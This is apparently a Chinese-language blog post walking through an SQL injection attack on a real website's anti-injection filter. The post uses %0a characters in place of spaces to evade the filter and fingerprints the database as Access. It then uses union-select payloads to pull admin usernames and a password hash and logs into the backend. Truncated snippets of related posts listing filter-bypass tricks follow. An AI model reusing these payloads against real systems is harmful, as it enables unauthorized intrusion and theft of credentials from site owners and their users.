SQL繞過例項

2022-04-17 01:06:13 字數 1930 閱讀 6206

簡單判斷是否存在注入

發現有防注入系統,在**位址後加入「-0」和「/」進行測試

明顯存在sql注入。

post提交無法繞過

在post data中輸入and 1=1 和and 1=2,勾選「enable post data」,單擊「execute」進行測試,如圖所示,結果無任何變化,說明直接post提交無法繞過。

使用%09(也就是tab鍵)可以繞過,經過測試還是不行,如圖所示,用%0a(換行符)替換下空格成功繞過

通過and (select count(*) from sysobjects)>0和and (select count(*) from msysobjects)>0的出錯資訊來判斷**採用的資料庫型別。若資料庫是sql-serve,則第一條,網頁一定執行正常,第二條則異常;若是access則兩條都會異常。在post中通過依次提交:

and%0a(select%0acount(*)%0afrom%0asysobjects)>0

and%0a(select%0acount(*)%0afrom%0amsysobjects)>0

其結果顯示「目前還沒有內容!」實際內容應該是id=1158的內容,兩條語句執行的結果均為異常,說明為access資料庫。

通過order by判斷列名

判斷是否存在admin表

and (select count(*) from admin)>0

and%0a(select%0acount(*)%0afrom%0aadmin)>0

判斷是否存在user以及pass欄位

獲取管理員密碼

id=1158%0aunion%0aselect%0a1,2,3,4,user,pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%0afrom%0aadmin,獲取admin-dh使用者的密碼「5ed9ff1d48e059b50db232f497b35b45」

id=1158%0aunion%0aselect%0a1,2,3,4,user,pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%0afrom%0aadmin%0awhere%0aid=1,獲取id為1的使用者密碼

登入後台

sql繞過注入

sql繞過注入我推薦在 這個官網上學習 下面是我在這個官網學習的乙個過程 order by 猜數字 union select 1,2,3,4,5,6,7,8,9,10 form admin 在這裡會報錯 因為需要繞過才能注入。因此需要在 上載入外掛程式 cookie 或者 modheader 都可以...

mysql 注釋 繞過 sql注入繞過方法

一 注釋符號繞過 在sql中常用的注釋符號有 二 大小寫繞過 當web正則過濾的時候對大小寫不敏感的情況下使用,一般很少會有這種漏洞 比如當過濾了select的時候我們可以採用select來查詢 三 內聯注釋繞過 把要使用的查詢語句放在 中,這樣在一般的資料庫是不會執行的,但是在mysql中內聯注釋...

mysql 注釋 繞過 SQL注入繞過技巧

1.繞過空格 注釋符 a0 兩個空格代替乙個空格,用tab代替空格,a0 空格 20 09 0a 0b 0c 0d a0 00 最基本的繞過方法,用注釋替換空格 注釋 使用浮點數 select from users where id 8e0union select 1,2,3 select from...